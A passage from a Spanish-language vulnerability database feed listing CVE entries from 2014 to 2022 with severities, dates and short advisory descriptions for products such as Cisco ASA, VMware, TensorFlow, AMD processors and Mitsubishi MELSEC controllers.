    Se ha detectado que TOTOLINK A3100R versiones V4.1.2cu.5050_B20200504 y V4.1.2cu.5247_B20211129, contienen una vulnerabilidad de inyección de comando por medio del parámetro magicid en la función uci_cloudupdate_config
  • CVE-2022-24466
    Severidad: BAJA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de Funciones de Seguridad de Windows Hyper-V
  • CVE-2022-24515
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Azure Site Recovery. Este ID de CVE es diferente de CVE-2022-24469, CVE-2022-24506, CVE-2022-24518, CVE-2022-24519
  • CVE-2022-21999
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-21997, CVE-2022-22717, CVE-2022-22718
  • CVE-2022-28965
    Severidad: MEDIA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 08/08/2023
    Múltiples vulnerabilidades de secuestro de DLL por medio de los componentes instup.exe y wsc_proxy.exe en Avast Premium Security versiones anteriores a v21.11.2500, permite a atacantes ejecutar código arbitrario o causar una Denegación de Servicio (DoS) por medio de un archivo DLL diseñado
  • CVE-2022-29196
    Severidad: BAJA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 21/07/2023
    TensorFlow es una plataforma de código abierto para el aprendizaje automático. En versiones anteriores a 2.9.0, 2.8.1, 2.7.2 y 2.6.4, la implementación de "tf.raw_ops.Conv3DBackpropFilterV2" no comprueba completamente los argumentos de entrada. Esto resulta en un fallo de "CHECK" que puede ser usado para desencadenar un ataque de denegación de servicio. El código no comprueba que el argumento "filter_sizes" sea un vector. Las versiones 2.9.0, 2.8.1, 2.7.2 y 2.6.4 contienen un parche para este problema
  • CVE-2022-22972
    Severidad: ALTA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access, Identity Manager y vRealize Automation contienen una vulnerabilidad de omisión de autenticación que afecta a usuarios del dominio local. Un actor malicioso con acceso de red a la interfaz de usuario puede obtener acceso administrativo sin necesidad de autenticarse
  • CVE-2022-22973
    Severidad: ALTA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access y Identity Manager contienen una vulnerabilidad de escalada de privilegios. Un actor malicioso con acceso local puede escalar los privilegios a "root"
  • CVE-2014-3394
    Severidad: MEDIA
    Fecha de publicación: 10/10/2014
    Fecha de última actualización: 15/08/2023
    La implementación Smart Call Home (SCH) en Cisco ASA Software 8.2 anterior a 8.2(5.50), 8.4 anterior a 8.4(7.15), 8.6 anterior a 8.6(1.14), 8.7 anterior a 8.7(1.13), 9.0 anterior a 9.0(4.8), y 9.1 anterior a 9.1(5.1) permite a atacantes remotos evadir la validación de certificados a través de un certificado VeriSign arbitrario, también conocido como Bug ID CSCun10916.
  • CVE-2019-1714
    Severidad: MEDIA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la implementación del Security Assertion Markup Language (SAML) versión 2.0 Single Sign-On (SSO) para VPN SSL sin clientes (WebVPN) y AnyConnect Remote Access VPN en Cisco Adaptive Security Appliance (ASA) Programa y Cisco Firepower Threat Defense (FTD) El programa podría permitir a un atacante remoto no autenticado establecer con éxito una sesión VPN en un dispositivo afectado. La vulnerabilidad se debe a una gestión inadecuada de las credenciales cuando se utiliza NT LAN Manager (NTLM) o autenticación básica. Un atacante podría explotar esta vulnerabilidad abriendo una sesión VPN a un dispositivo afectado después de que otro usuario VPN se haya autenticado con éxito en el dispositivo afectado a través de SAML SSO. Un exploit con éxito podría permitir al atacante conectarse a redes seguras detrás del dispositivo afectado.
  • CVE-2022-31624
    Severidad: BAJA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    MariaDB Server versiones anteriores a 10.7, es vulnerable a una denegación de servicio. Mientras es ejecutado el método log_statement_ex del archivo plugin/server_audit/server_audit.c, el bloqueo mantenido lock_bigbuffer no es liberado correctamente, lo que permite a usuarios locales desencadenar una denegación de servicio debido al bloqueo
  • CVE-2022-28991
    Severidad: MEDIA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Multi Store Inventory Management System versión v1.0, contiene una vulnerabilidad de divulgación de información que permite a atacantes acceder a archivos confidenciales
  • CVE-2022-31622
    Severidad: BAJA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    MariaDB Server versiones anteriores a 10.7, es vulnerable a una denegación de servicio. En el archivo extra/mariabackup/ds_compress.cc, cuando es producido un error (pthread_create devuelve un valor distinto de cero) mientras es ejecutado el método create_worker_threads, el bloqueo retenido no es liberado correctamente, lo que permite a usuarios locales desencadenar una denegación de servicio debido al bloqueo
  • CVE-2018-0240
    Severidad: ALTA
    Fecha de publicación: 19/04/2018
    Fecha de última actualización: 15/08/2023
    Múltiples vulnerabilidades en la característica Application Layer Protocol de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software podrían permitir que un atacante remoto no autenticado desencadene una recarga del dispositivo afectado, lo que resulta en una denegación de servicio (DoS). Las vulnerabilidades se deben a errores de lógica durante la inspección de tráfico. Un atacante podría explotar estas vulnerabilidades enviando un gran volumen de tráfico malicioso a través de un dispositivo afectado. Su explotación podría permitir que el atacante provoque una condición de deadlock, lo que resulta en la recarga del dispositivo afectado. Estas vulnerabilidades afectan a las versiones de Cisco ASA Software y Cisco FTD Software configuradas para la inspección de Application Layer Protocol en los siguientes productos de Cisco: 3000 Series Industrial Security Appliance (ISA), ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module y FTD Virtual (FTDv). Cisco Bug IDs: CSCve61540, CSCvh23085, CSCvh95456.
  • CVE-2021-31001
    Severidad: MEDIA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Se ha solucionado un problema de permisos con una validación mejorada. Este problema se ha solucionado en iOS 15.2 y iPadOS 15.2, watchOS 8.3, macOS Monterey 12.1, tvOS 15.2. Una aplicación maliciosa puede ser capaz de leer información de contacto sensible
  • CVE-2021-30998
    Severidad: MEDIA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Existía un problema de S/MIME en el manejo del correo electrónico cifrado. Este problema se solucionó con la mejora de la selección del certificado de cifrado. Este problema se ha solucionado en iOS 15.2 y iPadOS 15.2. La dirección de correo electrónico de un remitente puede filtrarse al enviar un correo electrónico cifrado S/MIME utilizando un certificado con más de una dirección de correo electrónico
  • CVE-2022-26945
    Severidad: ALTA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    go-getter hasta 1.5.11 y 2.0.2 permitía el cambio de protocolo, la redirección infinita y la derivación de la configuración mediante el abuso del procesamiento de cabeceras de respuesta HTTP personalizadas. Corregido en 1.6.1 y 2.1.0
  • CVE-2021-30944
    Severidad: MEDIA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Descripción: Se ha solucionado un problema de lógica con la mejora de la gestión de estados. Este problema se ha solucionado en iOS 15.2 y iPadOS 15.2, watchOS 8.3, macOS Monterey 12.1, tvOS 15.2. Una app maliciosa podría acceder a los datos de otras apps habilitando un registro adicional
  • CVE-2021-26317
    Severidad: ALTA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Una falta de verificación del protocolo en el SMM podría permitir a un atacante controlar el protocolo y modificar la flash SPI, resultando en una potencial ejecución de código arbitrario
  • CVE-2021-26363
    Severidad: BAJA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Una UApp o ABL maliciosa o comprometida podría potencialmente cambiar el valor que el ASP usa para su DRAM reservada, a uno fuera del área cercada, conllevando potencialmente a una exposición de datos
  • CVE-2021-46744
    Severidad: BAJA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    Un atacante con acceso a un hipervisor malicioso puede ser capaz de inferir los valores de los datos usados en un huésped SEV en CPUs AMD mediante la monitorización de los valores del texto cifrado a lo largo del tiempo
  • CVE-2021-26386
    Severidad: ALTA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Un atacante puede usar una UApp o ABL maliciosa o comprometida para emitir una llamada al sistema malformada al cargador de arranque de la fase 2, conllevando potencialmente a una corrupción de la memoria y una ejecución de código
  • CVE-2021-26388
    Severidad: MEDIA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación inapropiada del directorio de la BIOS puede permitir que las búsquedas lean más allá de la copia de la tabla del directorio en la RAM, exponiendo contenidos de memoria fuera de límites, resultando en una potencial denegación de servicio
  • CVE-2022-0005
    Severidad: BAJA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Una información confidencial accesible mediante el sondeo físico de la interfaz JTAG para algunos procesadores Intel(R) con SGX puede permitir que un usuario no privilegiado permita potencialmente una divulgación de información por medio del acceso físico
  • CVE-2022-21151
    Severidad: BAJA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Una eliminación de la optimización del procesador o la modificación del código crítico para la seguridad de algunos procesadores Intel(R) puede permitir que un usuario autenticado permita potencialmente una divulgación de información por medio del acceso local
  • CVE-2021-26361
    Severidad: BAJA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Un atacante podría usar una aplicación de usuario (UApp) o un cargador de arranque AGESA (ABL) maliciosos o comprometidos para extraer memoria arbitraria del cargador de arranque de la fase 2 de ASP, conllevando potencialmente a una divulgación de información
  • CVE-2021-26376
    Severidad: MEDIA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    Unas comprobaciones insuficientes en la FeatureConfig de la Unidad de Administración del Sistema (SMU) pueden resultar en una nueva habilitación de las funciones que podría resultar en una denegación de recursos y/o una denegación de servicio
  • CVE-2021-26373
    Severidad: MEDIA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    Unas comprobaciones de límites insuficientes en la Unidad de Administración del Sistema (SMU) pueden resultar en un mal funcionamiento de la tensión del sistema que podría resultar en una denegación de recursos y/o posiblemente a la denegación de servicio
  • CVE-2022-30990
    Severidad: MEDIA
    Fecha de publicación: 18/05/2022
    Fecha de última actualización: 21/07/2023
    Una divulgación de información confidencial debido a permisos de carpetas no seguras. Los siguientes productos están afectados: Acronis Cyber Protect 15 (Linux) versiones anteriores a compilación 29240, Acronis Agent (Linux) versiones anteriores a compilación 28037
  • CVE-2021-26351
    Severidad: MEDIA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de la dirección de la DRAM en System Management Unit (SMU) puede resultar en una lectura/escritura de DMA (Acceso Directo a Memoria) desde/a una dirección de DRAM no válida que podría resultar en una denegación de servicio
  • CVE-2021-20226
    Severidad: MEDIA
    Fecha de publicación: 23/02/2021
    Fecha de última actualización: 28/07/2023
    Se encontró un fallo de uso de la memoria previamente liberada en io_uring en el kernel de Linux, donde un atacante local con un privilegio de usuario podría causar un problema de denegación de servicio en el sistema. El problema resulta de una falta de comprobación de la existencia de un objeto antes de llevar a cabo operaciones en el objeto al no incrementar el contador de referencia de archivo mientras está en uso. La mayor amenaza de esta vulnerabilidad es la integridad de los datos, la confidencialidad y la disponibilidad del sistema
  • CVE-2022-28993
    Severidad: ALTA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 08/08/2023
    Multi Store Inventory Management System versión v1.0, permite a atacantes llevar a cabo una toma de control de cuentas por medio de una petición POST diseñada
  • CVE-2021-44733
    Severidad: MEDIA
    Fecha de publicación: 22/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta un uso de memoria previamente liberada en el archivo drivers/tee/tee_shm.c en el subsistema TEE en el kernel de Linux versiones hasta 5.15.11. Esto ocurre debido a una condición de carrera en tee_shm_get_from_id durante un intento de liberar un objeto de memoria compartida
  • CVE-2022-22328
    Severidad: BAJA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    IBM SterlingPartner Engagement Manager versión 6.2.0, podría permitir a un usuario malicioso elevar sus privilegios y llevar a cabo operaciones no deseadas en los datos de otro usuario. IBM X-Force ID: 218871
  • CVE-2021-26366
    Severidad: BAJA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Un atacante, que haya obtenido altos privilegios por algún otro tipo de vulnerabilidad, puede ser capaz de leer los datos de la ROM de arranque, resultando en una pérdida de la integridad del sistema
  • CVE-2021-30028
    Severidad: ALTA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que SOOTEWAY Wi-Fi Range Extender versión v1.5, usa credenciales por defecto (la contraseña de la cuenta de administrador) para acceder al servicio TELNET, lo que permite a atacantes borrar/leer/escribir el firmware de forma remota
  • CVE-2022-21195
    Severidad: MEDIA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete url-regex son vulnerables a una Denegación de Servicio por Expresión Regular (ReDoS) que puede causar el bloqueo del uso de la CPU
  • CVE-2022-23332
    Severidad: ALTA
    Fecha de publicación: 09/05/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de inyección de Comandos en el formulario de ping manual (Web UI) en Shenzhen Ejoin Information Technology Co. ACOM508/ACOM516/ACOM532 versión 609-915-041-100-020, permite a un atacante remoto inyectar código arbitrario por medio del campo
  • CVE-2022-24675
    Severidad: MEDIA
    Fecha de publicación: 20/04/2022
    Fecha de última actualización: 08/08/2023
    encoding/pem en Go versiones anteriores a 1.17.9 y versiones 1.8.x anteriores a 1.8.1 tiene un desbordamiento de pila Decode a través de una gran cantidad de datos PEM.
  • CVE-2022-1423
    Severidad: MEDIA
    Fecha de publicación: 19/05/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el mecanismo de caché CI/CD en GitLab CE/EE afectando a todas las versiones a partir de la 1.0.2 anteriores a 14.8.6, todas las versiones a partir de la 14.9.0 anteriores a 14.9.4 y todas las versiones a partir de la 14.10.0 anteriores a 14.10.1, permite a un actor malicioso con privilegios de desarrollador llevar a cabo un envenenamiento de la caché conllevando a una ejecución de código arbitrario en ramas protegidas
  • CVE-2022-1413
    Severidad: MEDIA
    Fecha de publicación: 19/05/2022
    Fecha de última actualización: 08/08/2023
    Una falta de enmascaramiento de entradas en GitLab CE/EE, afectando a todas las versiones a partir de la 1.0.2 anteriores a 14.8.6, todas las versiones a partir de la 14.9.0 anteriores a 14.9.4 y todas las versiones a partir de la 14.10.0 anteriores a 14.10.1, causa una divulgación de propiedades de integración potencialmente confidenciales en la interfaz web
  • CVE-2022-29200
    Severidad: BAJA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 21/07/2023
    TensorFlow es una plataforma de código abierto para el aprendizaje automático. En versiones anteriores a 2.9.0, 2.8.1, 2.7.2 y 2.6.4, la implementación de "tf.raw_ops.LSTMBlockCell" no comprueba completamente los argumentos de entrada. Esto resulta en un fallo de "CHECK" que puede ser usado para desencadenar un ataque de denegación de servicio. El código no comprueba los rangos de ninguno de los argumentos de esta llamada a la API. Esto resulta en fallos de "CHECK" cuando son accedidos a los elementos del tensor. Las versiones 2.9.0, 2.8.1, 2.7.2 y 2.6.4 contienen un parche para este problema
  • CVE-2022-25155
    Severidad: MEDIA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad en el uso del hash de la contraseña en lugar de la contraseña para la autenticación en Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU todas las versiones, Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R series R00/01/02CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R04/08/16/32/120(ES)CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R08/16/32/120SFCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R08/16/32/120PCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R08/16/32/120PSFCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71GN11-T2 todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71GN11-EIP todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71C24(-R2/R4) todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71EN71 todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ72GF15-T2 todas las versiones, Mitsubishi Electric MELSEC Q serie Q03UDECPU todas las versiones, Mitsubishi Electric MELSEC Q serie Q04/06/10/13/20/26/50/100UDEHCPU todas las versiones, Mitsubishi Electric MELSEC Q serie Q03/04/06/13/26UDVCPU todas las versiones, Mitsubishi Electric MELSEC Q serie Q04/06/13/26UDPVCPU todas las versiones, Mitsubishi Electric MELSEC Q serie QJ71C24N(-R2/R4) todas las versiones, Mitsubishi Electric MELSEC Q serie QJ71E71-100 todas las versiones, Mitsubishi Electric MELSEC Q serie QJ72BR15 todas las versiones, Mitsubishi Electric MELSEC Q serie QJ72LP25(-25/G/GE) todas las versiones, Mitsubishi Electric MELSEC serie L L02/06/26CPU(-P) todas las versiones, Mitsubishi Electric MELSEC serie L L26CPU-(P)BT todas las versiones, Mitsubishi Electric MELSEC serie L LJ71C24(-R2) todas las versiones, Mitsubishi Electric MELSEC serie L LJ71E71-100 todas las versiones y Mitsubishi Electric MELSEC serie L LJ72GF15-T2 todas las versiones permiten que un atacante remoto no autenticado inicie sesión en el producto reproduciendo un hash de contraseña interceptado
  • CVE-2022-25156
    Severidad: MEDIA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    Uso de la vulnerabilidad Weak Hash en Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU todas las versiones, Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R series R00/01/02CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R04/08/16/32/120(ES)CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R08/16/32/120SFCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R08/16/32/120PCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R08/16/32/120PSFCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71C24(-R2/R4) todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71EN71 todas las versiones, Mitsubishi Electric MELSEC serie iQ-R RJ72GF15-T2 todas las versiones, Mitsubishi Electric MELSEC serie Q Q03UDECPU todas las versiones, Mitsubishi Electric MELSEC serie Q04/06/10/13/20/26/50/100UDEHCPU todas las versiones, Mitsubishi Electric MELSEC Q serie Q03/04/06/13/26UDVCPU todas las versiones, Mitsubishi Electric MELSEC Q serie Q04/06/13/26UDPVCPU todas las versiones, Mitsubishi Electric MELSEC Q serie QJ71C24N(-R2/R4) todas las versiones, Mitsubishi Electric MELSEC Q series QJ71E71-100 todas las versiones, Mitsubishi Electric MELSEC Q series QJ72BR15 todas las versiones, Mitsubishi Electric MELSEC Q series QJ72LP25(-25/G/GE) todas las versiones, Mitsubishi Electric MELSEC serie L L02/06/26CPU(-P) todas las versiones, Mitsubishi Electric MELSEC serie L L26CPU-(P)BT todas las versiones, Mitsubishi Electric MELSEC serie L LJ71C24(-R2) todas las versiones, Mitsubishi Electric MELSEC serie L LJ71E71-100 todas las versiones y Mitsubishi Electric MELSEC serie L LJ72GF15-T2 todas las versiones permite a un atacante remoto no autenticado iniciar sesión en el producto utilizando una contraseña invertida a partir de un hash de contraseña previamente interceptado
  • CVE-2022-25157
    Severidad: MEDIA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad en el uso del hash de la contraseña en lugar de la contraseña para la autenticación en Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU todas las versiones, Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R series R00/01/02CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R series R04/08/16/32/120(ES)CPU todas las versiones, Mitsubishi Electric MELSEC iQ-R series R08/16/32/120SFCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R08/16/32/120PCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R08/16/32/120PSFCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie R16/32/64MTCPU todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71C24(-R2/R4) todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71EN71 todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71GF11-T2 todas las versiones, Mitsubishi Electric MELSEC iQ-R serie RJ71GP21(S)-SX todas las versiones, Mitsubishi Electric MELSEC serie iQ-R RJ72GF15-T2 todas las versiones, Mitsubishi Electric MELSEC serie Q Q03UDECPU todas las versiones, Mitsubishi Electric MELSEC serie Q04/06/10/13/20/26/50/100UDEHCPU todas las versiones, Mitsubishi Electric MELSEC Q serie Q03/04/06/13/26UDVCPU todas las versiones, Mitsubishi Electric MELSEC Q serie Q04/06/13/26UDPVCPU todas las versiones, Mitsubishi Electric MELSEC Q serie QJ71C24N(-R2/R4) todas las versiones, Mitsubishi Electric MELSEC Q serie QJ71E71-100 todas las versiones, Mitsubishi Electric MELSEC serie L L02/06/26CPU(-P) todas las versiones, Mitsubishi Electric MELSEC serie L L26CPU-(P)BT todas las versiones, Mitsubishi Electric MELSEC serie L LJ71C24(-R2) todas las versiones, Mitsubishi Electric MELSEC serie L LJ71E71-100 todas las versiones y Mitsubishi Electric MELSEC serie L LJ72GF15-T2 todas las versiones permiten a un atacante remoto no autenticado revelar o manipular la información del producto mediante el uso de un hash de contraseña interceptado
  • CVE-2022-29201
    Severidad: BAJA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 21/07/2023
    TensorFlow es una plataforma de código abierto para el aprendizaje automático. En versiones anteriores a 2.9.0, 2.8.1, 2.7.2 y 2.6.4, la implementación de "tf.raw_ops.QuantizedConv2D" no comprobaba completamente los argumentos de entrada. En este caso, las referencias se vinculan a "nullptr" para cada argumento que esté vacío. Las versiones 2.9.0, 2.8.1, 2.7.2 y 2.6.4 contienen un parche para este problema
  • CVE-2022-29202
    Severidad: BAJA
    Fecha de publicación: 20/05/2022
    Fecha de última actualización: 21/07/2023
    TensorFlow es una plataforma de código abierto para el aprendizaje automático. En versiones anteriores a 2.9.0, 2.8.1, 2.7.2 y 2.6.4, la implementación de "tf.ragged.constant" no comprueba completamente los argumentos de entrada. Esto resulta en una denegación de servicio al consumir toda la memoria disponible. Las versiones 2.9.0, 2.8.1, 2.7.2 y 2.6.4 contienen un parche para este problema
  • CVE-2022-1473
    Severidad: MEDIA
    Fecha de publicación: 03/05/2022
    Fecha de última actualización: 08/08/2023
    La función OPENSSL_LH_flush(), que vacía una tabla hash, contiene un error que rompe el reúso de la memoria ocupada por las entradas de la tabla hash eliminadas. Esta función es usado cuando son descodificados certificados o claves. Si un proceso de larga duración decodifica periódicamente certificados o claves, su uso de memoria será expandida sin límites y el proceso podría ser terminado por el sistema operativo causando una denegación de servicio. Además, recorrer las entradas vacías de la tabla hash llevará cada vez más tiempo. Normalmente, estos procesos de larga duración pueden ser clientes TLS o servidores TLS configurados para aceptar la autenticación de certificados de clientes. La función fue añadida en la versión 3.0 de OpenSSL, por lo que las versiones anteriores no están afectadas por el problema. Corregido en OpenSSL versión 3.0.3 (Afectado 3.0.0,3.0.1,3.0.2)
  • CVE-2022-31466
    Severidad: MEDIA
    Fecha de publicación: 23/05/2022
    Fecha de última actualización: 08/08/2023
    La vulnerabilidad Tiempo de comprobación - Tiempo de uso (TOCTOU) en Quick Heal Total Security anterior a la versión 12.1.1.27 permite a un atacante local conseguir una escalada de privilegios, que puede llevar a la eliminación de archivos del sistema. Esto se consigue aprovechando el tiempo que transcurre entre la detección de un archivo como malicioso y el momento en que se realiza la acción de ponerlo en cuarentena o limpiarlo, y utilizando ese tiempo para sustituir el archivo malicioso por un enlace simbólico
  • CVE-2022-30508
    Severidad: MEDIA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que DedeCMS versión v5.7.93, contiene una vulnerabilidad de eliminación arbitraria de archivos en el archivo upload.php por medio del parámetro delete
  • CVE-2022-26703
    Severidad: BAJA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de autorización con una administración de estados mejorada. Este problema es corregido en iOS versión 15.5 y iPadOS versión 15.5. Una persona con acceso físico a un dispositivo iOS podría acceder a las fotos desde la pantalla de bloqueo
  • CVE-2022-29334
    Severidad: ALTA
    Fecha de publicación: 24/05/2022
    Fecha de última actualización: 08/08/2023
    Un problema en H versión v1.0, permite a atacantes omitir la autenticación por medio de un ataque de repetición de sesión
  • CVE-2022-29869
    Severidad: MEDIA
    Fecha de publicación: 27/04/2022
    Fecha de última actualización: 08/08/2023
    cifs-utils versiones hasta 6.14, con registro detallado, puede causar un filtrado de información cuando un archivo contiene caracteres = (signo de igualdad) pero no es un archivo de credenciales válido
  • CVE-2021-25220
    Severidad: MEDIA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 23/07/2023
    BIND versiones 9.11.0 posteriores a 9.11.36, versiones 9.12.0 posteriores a 9.16.26, versiones 9.17.0 posteriores a 9.18.0, Ediciones Preliminares Soportadas con BIND: versiones .11.4-S1 posteriores a 9.11.36-S1, versiones 9.16.8-S1 posteriores a 9.16.26-S1, también creemos que las versiones de BIND 9 anteriores a las mostradas - hasta la versión 9.1.0, incluyendo las ediciones preliminares soportadas - también están afectadas pero no han sido probadas ya que son EOL. La caché podría envenenarse con registros incorrectos, conllevando a una realización de consultas a servidores erróneos, lo que también podría resultar en que se devolviera información falsa a clientes
  • CVE-2022-20064
    Severidad: ALTA
    Fecha de publicación: 11/04/2022
    Fecha de última actualización: 08/08/2023
    En ccci, se presenta un posible filtrado de punteros del kernel debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06108617; ID de Incidencia: ALPS06108617
  • CVE-2021-42248
    Severidad: MEDIA
    Fecha de publicación: 24/05/2022
    Fecha de última actualización: 08/08/2023
    GJSON versiones anteriores a 1.9.2 incluyéndola, permite a atacantes causar un redos por medio de una entrada JSON diseñada
  • CVE-2022-0492
    Severidad: MEDIA
    Fecha de publicación: 03/03/2022
    Fecha de última actualización: 21/07/2023
    Se ha encontrado una vulnerabilidad en la función cgroup_release_agent_write en el archivo kernel/cgroup/cgroup-v1.c del kernel de Linux. Este fallo, bajo determinadas circunstancias, permite el uso de la función cgroups v1 release_agent para escalar privilegios y saltarse el aislamiento del espacio de nombres de forma no esperada
  • CVE-2022-30594
    Severidad: MEDIA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    El kernel de Linux versiones anteriores a 5.17.2, maneja inapropiadamente los permisos de seccomp. La ruta de código PTRACE_SEIZE permite a atacantes omitir las restricciones previstas al establecer el flag PT_SUSPEND_SECCOMP
  • CVE-2021-38904
    Severidad: MEDIA
    Fecha de publicación: 22/04/2022
    Fecha de última actualización: 08/08/2023
    IBM Cognos Analytics versiones 11.1.7, 11.2.0 y 11.1.7, podrían permitir a un atacante remoto obtener credenciales del navegador de un usuario por medio de una configuración incorrecta de autocompletar. IBM X-Force ID: 209693
  • CVE-2021-38905
    Severidad: MEDIA
    Fecha de publicación: 22/04/2022
    Fecha de última actualización: 08/08/2023
    IBM Cognos Analytics versiones 11.1.7, 11.2.0 y 11.1.7, podría permitir a un usuario autenticado visualizar páginas de informes a las que no debería tener acceso. IBM X-Force ID: 209697
  • CVE-2022-0543
    Severidad: ALTA
    Fecha de publicación: 18/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que redis, una base de datos persistente de valores clave, debido a un problema de empaquetado, es propenso a un escape del sandbox de Lua (específico de Debian), que podría resultar en una ejecución de código remota
  • CVE-2021-40161
    Severidad: MEDIA
    Fecha de publicación: 23/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de corrupción de memoria puede conducir a la ejecución de código a través de archivos DLL maliciosamente diseñados a través de PDFTron anterior a la versión 9.0.7
  • CVE-2022-29405
    Severidad: MEDIA
    Fecha de publicación: 25/05/2022
    Fecha de última actualización: 08/08/2023
    En Apache Archiva, cualquier usuario registrado puede restablecer la contraseña de cualquier usuario. Esto ha sido corregido en Archiva versión 2.2.8
  • CVE-2021-45914
    Severidad: ALTA
    Fecha de publicación: 24/05/2022
    Fecha de última actualización: 08/08/2023
    En LuxSoft LuxCal Web Calendar versiones anteriores a 5.2.0, un atacante no autenticado puede manipular una petición POST. Esto permite que la sesión del atacante sea autenticada como cualquier usuario registrado de LuxCal, incluido el administrador del sitio
  • CVE-2021-45915
    Severidad: ALTA
    Fecha de publicación: 24/05/2022
    Fecha de última actualización: 08/08/2023
    En LuxSoft LuxCal Web Calendar versiones anteriores a 5.2.0, un atacante no autenticado puede manipular el valor de una cookie. Esto permite que la sesión del atacante se autentique como cualquier usuario registrado de LuxCal, incluido el administrador del sitio
  • CVE-2022-29518
    Severidad: MEDIA
    Fecha de publicación: 18/05/2022
    Fecha de última actualización: 08/08/2023
